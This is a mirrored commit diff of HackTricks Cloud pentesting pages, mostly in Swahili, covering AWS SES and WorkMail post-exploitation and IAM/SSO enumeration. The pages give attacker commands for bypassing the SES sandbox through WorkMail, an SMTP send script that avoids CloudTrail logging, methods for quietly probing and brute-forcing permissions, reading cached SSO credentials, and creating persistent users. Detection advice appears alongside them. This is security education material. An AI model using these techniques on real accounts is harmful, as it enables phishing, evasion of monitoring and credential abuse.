gitea-mirror/hacktricks-cloud
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks-cloud.git synced 2026-03-12 21:22:57 -07:00
Code Issues Packages Projects Releases Wiki Activity

Translated ['src/pentesting-cloud/aws-security/aws-post-exploitation/aws

Browse Source
This commit is contained in:
Translator
2026-02-12 12:51:44 +00:00
parent 68a1c8d60a
commit 58f74bcc61
3 changed files with 152 additions and 52 deletions
Download Patch File Download Diff File Expand all files Collapse all files

26
src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ses-post-exploitation/README.md
View File

@@ -4,7 +4,7 @@
## SES
Kwa taarifa zaidi angalia:
Kwa maelezo zaidi angalia:
{{#ref}}
../../aws-services/aws-ses-enum.md
@@ -25,15 +25,15 @@ Tuma barua pepe.
```bash
aws ses send-raw-email --raw-message file://message.json
```
Bado haijajaribiwa.
Bado inahitaji kujaribiwa.
### `ses:SendTemplatedEmail`
Tuma barua pepe kwa kutumia kiolezo.
Tuma barua pepe kwa kutumia templeti.
```bash
aws ses send-templated-email --source <value> --destination <value> --template <value>
```
Bado inahitaji kujaribiwa.
Bado haijajaribiwa.
### `ses:SendBulkTemplatedEmail`
@@ -51,7 +51,7 @@ aws sesv2 send-bulk-email --default-content <value> --bulk-email-entries <value>
```
### `ses:SendBounce`
Tuma **bounce email** juu ya barua pepe uliopokea (ikionyesha kwamba barua pepe haikuweza kupokelewa). Hii inaweza kufanywa tu **hadi saa 24 baada ya kupokea** barua pepe.
Tuma **bounce email** kwa barua pepe uliopokelewa (ikionyesha kuwa barua pepe haikuweza kupokelewa). Hii inaweza kufanywa tu **hadi 24h baada ya kupokea** barua pepe.
```bash
aws ses send-bounce --original-message-id <value> --bounce-sender <value> --bounced-recipient-info-list <value>
```
@@ -59,11 +59,23 @@ Bado haijajaribiwa.
### `ses:SendCustomVerificationEmail`
Hii itatuma barua pepe ya uthibitisho iliyobinafsishwa. Huenda ukahitaji ruhusa pia za kuunda barua pepe ya kiolezo.
Hii itatuma barua pepe ya uthibitisho iliyobinafsishwa. Huenda uhitaji ruhusa pia kuunda kiolezo cha barua pepe.
```bash
aws ses send-custom-verification-email --email-address <value> --template-name <value>
aws sesv2 send-custom-verification-email --email-address <value> --template-name <value>
```
Bado haijajaribiwa.
Bado inahitaji kujaribiwa.
## WorkMail pivot to bypass SES sandbox
Wakati `ses:GetAccount` inaonyesha akaunti bado iko katika SES sandbox na `ses:ListIdentities` inarudisha hakuna watuma waliothibitishwa, washambuliaji wanaweza **pivot to WorkMail** kutuma mara moja (hakuna sandbox na quotas za default zilizo juu) kwa kuunda orgs, kuthibitisha domains, na kusajili mailboxes.
{{#ref}}
../aws-workmail-post-exploitation/README.md
{{#endref}}
## References
- [Threat Actors Using AWS WorkMail in Phishing Campaigns](https://www.rapid7.com/blog/post/dr-threat-actors-aws-workmail-phishing-campaigns)
{{#include ../../../../banners/hacktricks-training.md}}

76
src/pentesting-cloud/aws-security/aws-post-exploitation/aws-workmail-post-exploitation/README.md Normal file
View File

@@ -0,0 +1,76 @@
# AWS - WorkMail Post Exploitation
{{#include ../../../../banners/hacktricks-training.md}}
## Abusing WorkMail to bypass SES sandbox
Even if SES is stuck in the **sandbox** (verified-recipient only, ~200 msgs/24h, 1 msg/s), WorkMail haina vikwazo vinavyofanana. Mshambuliaji mwenye long-term keys anaweza kuanzisha miundombinu ya barua ya muda na kuanza kutuma mara moja:
1. **Create a WorkMail org (region-scoped)**
```bash
aws workmail create-organization --region us-east-1 --alias temp-mail --directory-id <dir-id-if-reusing>
```
2. **Verify attacker-controlled domains** (WorkMail invokes SES APIs as `workmail.amazonaws.com`):
```bash
aws ses verify-domain-identity --domain attacker-domain.com
aws ses verify-domain-dkim --domain attacker-domain.com
```
3. **Provision mailbox users** and register them:
```bash
aws workmail create-user --organization-id <org-id> --name marketing --display-name "Marketing"
aws workmail register-to-work-mail --organization-id <org-id> --entity-id <user-id> --email marketing@attacker-domain.com
```
Notes:
- Default **recipient cap** documented by AWS: **100,000 external recipients/day per org** (aggregated across users).
- Domain verification activity itaonekana katika CloudTrail chini ya SES lakini na **`invokedBy`: `workmail.<region>.amazonaws.com`**, hivyo matukio ya uthibitisho ya SES yanaweza kuwa yanahusiana na usanidi wa WorkMail badala ya kampeni za SES.
- Watumiaji wa sanduku la WorkMail wanakuwa sehemu ya **application-layer persistence** huru kutoka kwa IAM users.
## Sending paths & telemetry gaps
### Web client (WorkMail UI)
- Inarekodiwa kama matukio ya **`ses:SendRawEmail`** katika CloudTrail.
- `userIdentity.type` = `AWSService`, `invokedBy/sourceIPAddress/userAgent` = `workmail.<region>.amazonaws.com`, kwa hivyo **true client IP imefichwa**.
- `requestParameters` bado leak sender (`source`, `fromArn`, `sourceArn`, configuration set) ili kuunganisha na domain/sanduku la barua zilizothibitishwa hivi karibuni.
### SMTP (stealthiest)
- Endpoint: `smtp.mail.<region>.awsapps.com:465` (SMTP over SSL) kwa kutumia password ya sanduku la barua.
- **No CloudTrail data events** zinazozalishwa kwa ajili ya SMTP delivery, hata pale SES data events zikiwa zimewezeshwa.
- Pointi za utambuzi muhimu ni provisioning ya org/domain/user na SES identity ARNs zinazotajwa katika matukio ya `SendRawEmail` yaliyotumwa kupitia web baadaye.
<details>
<summary>Example SMTP send via WorkMail</summary>
```python
import smtplib
from email.message import EmailMessage
SMTP_SERVER = "smtp.mail.us-east-1.awsapps.com"
SMTP_PORT = 465
EMAIL_ADDRESS = "marketing@attacker-domain.com"
EMAIL_PASSWORD = "SuperSecretPassword!"
target = "victim@example.com" # can be unverified/external
msg = EmailMessage()
msg["Subject"] = "WorkMail SMTP"
msg["From"] = EMAIL_ADDRESS
msg["To"] = target
msg.set_content("Delivered via WorkMail SMTP")
with smtplib.SMTP_SSL(SMTP_SERVER, SMTP_PORT) as smtp:
smtp.login(EMAIL_ADDRESS, EMAIL_PASSWORD)
smtp.send_message(msg)
```
</details>
## Mambo ya kugundua
- Ikiwa WorkMail haifai, zuia kwa kutumia **SCPs** (`workmail:*` deny) katika ngazi ya shirika.
- Weka tahadhari wakati wa provisioning: `workmail:CreateOrganization`, `workmail:CreateUser`, `workmail:RegisterToWorkMail`, na uthibitisho wa SES na `invokedBy=workmail.amazonaws.com` (`ses:VerifyDomainIdentity`, `ses:VerifyDomainDkim`).
- Angalia matukio yasiyo ya kawaida ya **`ses:SendRawEmail`** ambapo identity ARNs zinarejelea domains mpya na IP/UA ya chanzo ni sawa na `workmail.<region>.amazonaws.com`.
## Marejeo
- [Threat Actors Using AWS WorkMail in Phishing Campaigns](https://www.rapid7.com/blog/post/dr-threat-actors-aws-workmail-phishing-campaigns)
- [AWS WorkMail limits](https://docs.aws.amazon.com/workmail/latest/adminguide/limits.html)
{{#include ../../../../banners/hacktricks-training.md}}

102
src/pentesting-cloud/aws-security/aws-services/aws-iam-enum.md
View File

@@ -1,18 +1,18 @@
# AWS - IAM, Kituo cha Utambulisho & SSO Enum
# AWS - IAM, Identity Center & SSO Uorodheshaji
{{#include ../../../banners/hacktricks-training.md}}
## IAM
You can find a **description of IAM** in:
Unaweza kupata **maelezo ya IAM** katika:
{{#ref}}
../aws-basic-information/
{{#endref}}
### Enumeration
### Uorodheshaji
Main permissions needed:
Ruhusa kuu zinazohitajika:
- `iam:ListPolicies`, `iam:GetPolicy` and `iam:GetPolicyVersion`
- `iam:ListRoles`
@@ -88,37 +88,49 @@ aws iam get-account-password-policy
aws iam list-mfa-devices
aws iam list-virtual-mfa-devices
```
### Uthibitisho wa ruhusa kwa siri kupitia kushindwa kwa makusudi
Wakati `List*` au simulator APIs zimezimwa, unaweza **kuhakiki ruhusa za mabadiliko bila kuunda rasilimali za kudumu** kwa kulazimisha makosa ya uthibitishaji yanayoweza kutabirika. AWS bado huangalia IAM kabla ya kurudisha makosa haya, kwa hivyo kuona kosa kunathibitisha mwito ana haki ya kutekeleza kitendo hicho:
```bash
# Confirm iam:CreateUser without creating a new principal (fails only after authz)
aws iam create-user --user-name <existing_user> # -> EntityAlreadyExistsException
# Confirm iam:CreateLoginProfile while learning password policy requirements
aws iam create-login-profile --user-name <target_user> --password lower --password-reset-required # -> PasswordPolicyViolationException
```
Majaribio haya bado huunda matukio ya CloudTrail (na `errorCode` imewekwa) lakini huzuia kuacha artifacts mpya za IAM, na huwafanya kuwa muhimu kwa **uthibitishaji wa ruhusa kwa kelele ndogo** wakati wa interactive recon.
### Permissions Brute Force
Ikiwa unavutiwa na ruhusa zako lakini huna ufikiaji wa kuuliza IAM unaweza kila wakati kuzilazimisha.
Ikiwa ungependa kujua ruhusa zako mwenyewe lakini huna ufikiaji wa kuhoji IAM, unaweza kila wakati kuzifanyia brute-force.
#### bf-aws-permissions
Chombo [**bf-aws-permissions**](https://github.com/carlospolop/bf-aws-permissions) ni script ya bash tu ambayo itakimbia ikitumia profaili iliyoonyeshwa **`list*`, `describe*`, `get*`** vitendo vyote inavyoweza kupata kwa kutumia ujumbe wa msaada wa `aws` cli na **kurudisha utekelezaji uliofanikiwa**.
Zana [**bf-aws-permissions**](https://github.com/carlospolop/bf-aws-permissions) ni tu bash script ambayo itaendesha ikitumia profile iliyotajwa zote hatua za **`list*`, `describe*`, `get*`** zinazoweza kupatikana kwa kutumia ujumbe wa msaada wa aws cli na **kurudisha utekelezaji uliofanikiwa**.
```bash
# Bruteforce permissions
bash bf-aws-permissions.sh -p default > /tmp/bf-permissions-verbose.txt
```
#### bf-aws-perms-simulate
Chombo [**bf-aws-perms-simulate**](https://github.com/carlospolop/bf-aws-perms-simulate) kinaweza kupata ruhusa zako za sasa (au za wakuu wengine) ikiwa una ruhusa **`iam:SimulatePrincipalPolicy`**
Chombo [**bf-aws-perms-simulate**](https://github.com/carlospolop/bf-aws-perms-simulate) kinaweza gundua ruhusa zako za sasa (au za principals wengine) ikiwa una ruhusa **`iam:SimulatePrincipalPolicy`**
```bash
# Ask for permissions
python3 aws_permissions_checker.py --profile <AWS_PROFILE> [--arn <USER_ARN>]
```
#### Perms2ManagedPolicies
Ikiwa umepata **idhini fulani ambazo mtumiaji wako ana**, na unafikiri kwamba zinatolewa na **jukumu la AWS lililosimamiwa** (na si la kawaida). Unaweza kutumia chombo [**aws-Perms2ManagedRoles**](https://github.com/carlospolop/aws-Perms2ManagedPolicies) kuangalia yote **majukumu ya AWS yaliyosimamiwa yanayotoa idhini ulizogundua kwamba una**.
Kama umepata **idhini fulani ambazo mtumiaji wako ana**, na ukidhani zinatolewa na **managed AWS role** (na si ile ya custom). Unaweza kutumia zana [**aws-Perms2ManagedRoles**](https://github.com/carlospolop/aws-Perms2ManagedPolicies) ili kukagua zote **AWS managed roles that grants the permissions you discovered that you have**.
```bash
# Run example with my profile
python3 aws-Perms2ManagedPolicies.py --profile myadmin --permissions-file example-permissions.txt
```
> [!WARNING]
> Inawezekana "kujua" kama ruhusa ulizonazo zimetolewa na jukumu linalosimamiwa na AWS ikiwa unaona kwamba **una ruhusa juu ya huduma ambazo hazitumiki** kwa mfano.
> Inawezekana "kujua" ikiwa ruhusa ulizo nazo zimetolewa na role inayosimamiwa na AWS ikiwa utaona, kwa mfano, kwamba **una ruhusa kwa huduma ambazo hazitumiki**.
#### Cloudtrail2IAM
[**CloudTrail2IAM**](https://github.com/carlospolop/Cloudtrail2IAM) ni zana ya Python inayochambua **maktaba za AWS CloudTrail ili kutoa na kufupisha vitendo** vilivyofanywa na kila mtu au mtumiaji au jukumu maalum tu. Zana hiyo it **ichambue kila maktaba ya cloudtrail kutoka kwenye bucket iliyoashiriwa**.
[**CloudTrail2IAM**](https://github.com/carlospolop/Cloudtrail2IAM) ni zana ya Python inayochambua **AWS CloudTrail logs ili kutoa na kufupisha vitendo** vilivyofanywa na kila mtu au mtumiaji au role maalum. Zana hiyo itapitia kila cloudtrail log kutoka kwa bucket iliyotajwa.
```bash
git clone https://github.com/carlospolop/Cloudtrail2IAM
cd Cloudtrail2IAM
@@ -126,16 +138,16 @@ pip install -r requirements.txt
python3 cloudtrail2IAM.py --prefix PREFIX --bucket_name BUCKET_NAME --profile PROFILE [--filter-name FILTER_NAME] [--threads THREADS]
```
> [!WARNING]
> Ikiwa unapata .tfstate (faili za hali za Terraform) au faili za CloudFormation (hizi kwa kawaida ni faili za yaml zilizoko ndani ya bucket yenye prefix cf-templates), unaweza pia kuvisoma ili kupata usanidi wa aws na kujua ni ruhusa zipi zimepewa nani.
> Ikiwa utapata .tfstate (Terraform state files) au CloudFormation files (hizi kawaida ni yaml files zilizopo ndani ya bucket yenye prefix cf-templates), unaweza pia kuvisoma ili kupata mipangilio ya aws na kuona ni ruhusa gani zimepewa nani.
#### enumerate-iam
Ili kutumia chombo [**https://github.com/andresriancho/enumerate-iam**](https://github.com/andresriancho/enumerate-iam) kwanza unahitaji kupakua mwisho wote wa API AWS, kutoka kwa hizo skripti **`generate_bruteforce_tests.py`** itapata **"list\_", "describe\_", na "get\_" endpoints.** Na hatimaye, itajaribu **kuzipata** kwa kutumia akreditif zilizotolewa na **kuonyesha kama ilifanya kazi**.
To use the tool [**https://github.com/andresriancho/enumerate-iam**](https://github.com/andresriancho/enumerate-iam) kwanza unahitaji kupakua endpoints zote za API za AWS; kutoka kwa hizo script **`generate_bruteforce_tests.py`** itapata endpoints zote za **"list\_", "describe\_", and "get\_" endpoints.** Na hatimaye, itajaribu **kuwafikia** kwa credentials zilizotolewa na **kuonyesha kama ilifanya kazi**.
(Katika uzoefu wangu **chombo kinakwama katika hatua fulani**, [**angalia suluhisho hili**](https://github.com/andresriancho/enumerate-iam/pull/15/commits/77ad5b41216e3b5f1511d0c385da8cd5984c2d3c) kujaribu kutatua hilo).
(Kwa uzoefu wangu **tool inakamatika sehemu fulani**, [**checkout this fix**](https://github.com/andresriancho/enumerate-iam/pull/15/commits/77ad5b41216e3b5f1511d0c385da8cd5984c2d3c) ili kujaribu kurekebisha hilo).
> [!WARNING]
> Katika uzoefu wangu chombo hiki ni kama kile cha awali lakini kinafanya kazi vibaya zaidi na kinachunguza ruhusa chache zaidi.
> Kwa uzoefu wangu tool hii ni kama ile ya awali lakini inafanya kazi vibaya zaidi na inakagua ruhusa chache
```bash
# Install tool
git clone git@github.com:andresriancho/enumerate-iam.git
@@ -154,7 +166,7 @@ python3 enumerate-iam.py --access-key ACCESS_KEY --secret-key SECRET_KEY [--sess
```
#### weirdAAL
Unaweza pia kutumia chombo [**weirdAAL**](https://github.com/carnal0wnage/weirdAAL/wiki). Chombo hiki kitakagua **operesheni kadhaa za kawaida kwenye huduma kadhaa za kawaida** (kitakagua baadhi ya ruhusa za kuorodhesha na pia baadhi ya ruhusa za privesc). Lakini kitakagua tu ukaguzi ulioandikwa (njia pekee ya kukagua vitu zaidi ni kuandika majaribio zaidi).
Unaweza pia kutumia zana [**weirdAAL**](https://github.com/carnal0wnage/weirdAAL/wiki). Zana hii itakagua **operesheni kadhaa za kawaida kwenye huduma kadhaa za kawaida** (itatathmini baadhi ya enumeration permissions na pia baadhi ya privesc permissions). Lakini itakagua tu coded checks (njia pekee ya kukagua vitu zaidi ni kuandika tests zaidi).
```bash
# Install
git clone https://github.com/carnal0wnage/weirdAAL.git
@@ -178,7 +190,7 @@ python3 weirdAAL.py -m recon_all -t MyTarget # Check all permissions
# [+] elbv2 Actions allowed are [+]
# ['DescribeLoadBalancers', 'DescribeAccountLimits', 'DescribeTargetGroups']
```
#### Zana za Kuimarisha BF ruhusa
#### Vifaa vya Hardening kwa ruhusa za BF
{{#tabs }}
{{#tab name="CloudSploit" }}
@@ -208,43 +220,43 @@ steampipe dashboard
#### \<YourTool>
Hakuna kati ya zana zilizopita zinazoweza kuangalia karibu na ruhusa zote, hivyo ikiwa unajua zana bora zaidi tuma PR!
Hakuna kati ya zana zilizotajwa hapo awali inayoweza kuangalia karibu ruhusa zote, hivyo ikiwa unajua zana bora, tuma PR!
### Ufikiaji Usio na Uthibitisho
### Unauthenticated Access
{{#ref}}
../aws-unauthenticated-enum-access/aws-iam-and-sts-unauthenticated-enum/README.md
{{#endref}}
### Kuinua Haki
### Privilege Escalation
Katika ukurasa ufuatao unaweza kuangalia jinsi ya **kutumia ruhusa za IAM ili kuinua haki**:
Kwenye ukurasa unaofuata unaweza kuona jinsi ya **abuse IAM permissions to escalate privileges**:
{{#ref}}
../aws-privilege-escalation/aws-iam-privesc/README.md
{{#endref}}
### IAM Baada ya Kutekeleza
### IAM Post Exploitation
{{#ref}}
../aws-post-exploitation/aws-iam-post-exploitation/README.md
{{#endref}}
### IAM Kudumu
### IAM Persistence
{{#ref}}
../aws-persistence/aws-iam-persistence/README.md
{{#endref}}
## Kituo cha Utambulisho wa IAM
## IAM Identity Center
Unaweza kupata **maelezo ya Kituo cha Utambulisho wa IAM** katika:
Unaweza kupata **description of IAM Identity Center** katika:
{{#ref}}
../aws-basic-information/
{{#endref}}
### Unganisha kupitia SSO na CLI
### Connect via SSO with CLI
```bash
# Connect with sso via CLI aws configure sso
aws configure sso
@@ -255,18 +267,18 @@ sso_account_id = <account_numbre>
sso_role_name = AdministratorAccess
sso_region = us-east-1
```
### Enumeration
### Uorodheshaji
Vipengele vikuu vya Kituo cha Utambulisho ni:
Mambo kuu ya Identity Center ni:
- Watumiaji na vikundi
- Seti za Ruhusa: Zina sera zilizounganishwa
- Akaunti za AWS
- Permission Sets: Zina policies zimeambatishwa
- AWS Accounts
Kisha, uhusiano huundwa ili watumiaji/vikundi wawe na Seti za Ruhusa juu ya Akaunti ya AWS.
Kisha, uhusiano huundwa ili watumiaji/vikundi wawe na Permission Sets kwa AWS Account.
> [!NOTE]
> Kumbuka kwamba kuna njia 3 za kuunganisha sera kwenye Seti ya Ruhusa. Kuunganisha sera zinazodhibitiwa na AWS, sera zinazodhibitiwa na Wateja (sera hizi zinahitaji kuundwa katika akaunti zote ambazo Seti za Ruhusa zinahusisha), na sera za ndani (zilizofafanuliwa hapo).
> Kumbuka kwamba kuna njia 3 za kuambatisha policies kwa Permission Set. Kuambatisha AWS managed policies, Customer managed policies (policies hizi zinahitaji kuundwa katika akaunti zote ambazo Permission Set inaathiri), na inline policies (zilizoelezwa ndani yake).
```bash
# Check if IAM Identity Center is used
aws sso-admin list-instances
@@ -300,9 +312,9 @@ aws identitystore list-group-memberships --identity-store-id <store-id> --group-
## Get memberships or a user or a group
aws identitystore list-group-memberships-for-member --identity-store-id <store-id> --member-id <member-id>
```
### Local Enumeration
### Uorodheshaji wa Kijijini
Inawezekana kuunda ndani ya folda `$HOME/.aws` faili la config ili kuunda miprofaili inayopatikana kupitia SSO, kwa mfano:
Inawezekana kuunda ndani ya folda `$HOME/.aws` faili config ili kusanidi profaili zinazopatikana kupitia SSO, kwa mfano:
```ini
[default]
region = us-west-2
@@ -320,16 +332,16 @@ output = json
role_arn = arn:aws:iam::<acc-id>:role/ReadOnlyRole
source_profile = Hacktricks-Admin
```
Mkonfigu huu unaweza kutumika na amri:
Usanidi huu unaweza kutumika na amri zifuatazo:
```bash
# Login in ms-sso-profile
aws sso login --profile my-sso-profile
# Use dependent-profile
aws s3 ls --profile dependent-profile
```
Wakati **profaili kutoka SSO inatumika** kupata taarifa fulani, akidi zina **hifadhiwa** katika faili ndani ya folda **`$HOME/.aws/sso/cache`**. Hivyo basi zinaweza **kusomwa na kutumika kutoka hapo**.
Wakati **profile kutoka SSO inapotumika** kupata baadhi ya taarifa, nyaraka za uthibitisho **zimehifadhiwa** katika faili ndani ya folda **`$HOME/.aws/sso/cache`**. Kwa hivyo zinaweza **kusomwa na kutumika kutoka huko**.
Zaidi ya hayo, **akidi zaidi** zinaweza kuhifadhiwa katika folda **`$HOME/.aws/cli/cache`**. Hii folda ya cache inatumika hasa unapokuwa **ukifanya kazi na AWS CLI profiles** zinazotumia akidi za mtumiaji wa IAM au **kuchukua** majukumu kupitia IAM (bila SSO). Mfano wa usanidi:
Zaidi ya hayo, **nyaraka zaidi za uthibitisho** zinaweza kuhifadhiwa katika folda **`$HOME/.aws/cli/cache`**. Mfolda hii ya cache inatumiwa hasa unapokuwa **unafanya kazi na AWS CLI profiles** zinazotumia nyaraka za watumiaji wa IAM au **assume** roles kupitia IAM (bila SSO). Mfano wa config:
```ini
[profile crossaccountrole]
role_arn = arn:aws:iam::234567890123:role/SomeRole
@@ -337,36 +349,36 @@ source_profile = default
mfa_serial = arn:aws:iam::123456789012:mfa/saanvi
external_id = 123456
```
### Upatikanaji Usioidhinishwa
### Unauthenticated Access
{{#ref}}
../aws-unauthenticated-enum-access/aws-identity-center-and-sso-unauthenticated-enum/README.md
{{#endref}}
### Kuinua Mamlaka
### Privilege Escalation
{{#ref}}
../aws-privilege-escalation/aws-sso-and-identitystore-privesc/README.md
{{#endref}}
### Baada ya Kutekeleza
### Post Exploitation
{{#ref}}
../aws-post-exploitation/aws-sso-and-identitystore-post-exploitation/README.md
{{#endref}}
### Kudumu
### Persistence
#### Unda mtumiaji na uweke ruhusa kwake
#### Unda mtumiaji na umpe ruhusa
```bash
# Create user identitystore:CreateUser
aws identitystore create-user --identity-store-id <store-id> --user-name privesc --display-name privesc --emails Value=sdkabflvwsljyclpma@tmmbt.net,Type=Work,Primary=True --name Formatted=privesc,FamilyName=privesc,GivenName=privesc
## After creating it try to login in the console using the selected username, you will receive an email with the code and then you will be able to select a password
```
- Unda kundi na uweke ruhusa na kuweka mtumiaji anayedhibitiwa
- Toa ruhusa za ziada kwa mtumiaji au kundi lililodhibitiwa
- Kwa kawaida, ni watumiaji pekee wenye ruhusa kutoka Akaunti ya Usimamizi watakaoweza kufikia na kudhibiti Kituo cha Utambulisho wa IAM.
- Unda kikundi, umpe ruhusa, na umweke mtumiaji udhibitiwa ndani yake
- Mpa ruhusa za ziada mtumiaji udhibitiwa au kikundi
- Kwa chaguo-msingi, watumiaji pekee wenye ruhusa kutoka Management Account ndio watakaoweza kufikia na kudhibiti IAM Identity Center.
Hata hivyo, inawezekana kupitia Msimamizi wa Delegated kuruhusu watumiaji kutoka akaunti tofauti kuisimamia. Hawa hawataweza kuwa na ruhusa sawa, lakini wataweza kufanya [**shughuli za usimamizi**](https://docs.aws.amazon.com/singlesignon/latest/userguide/delegated-admin.html).
Hata hivyo, inawezekana kupitia Delegate Administrator kuruhusu watumiaji kutoka account tofauti kusimamia. Hawatakuwa na ruhusa sawa kabisa, lakini wataweza kutekeleza [**management activities**](https://docs.aws.amazon.com/singlesignon/latest/userguide/delegated-admin.html).
{{#include ../../../banners/hacktricks-training.md}}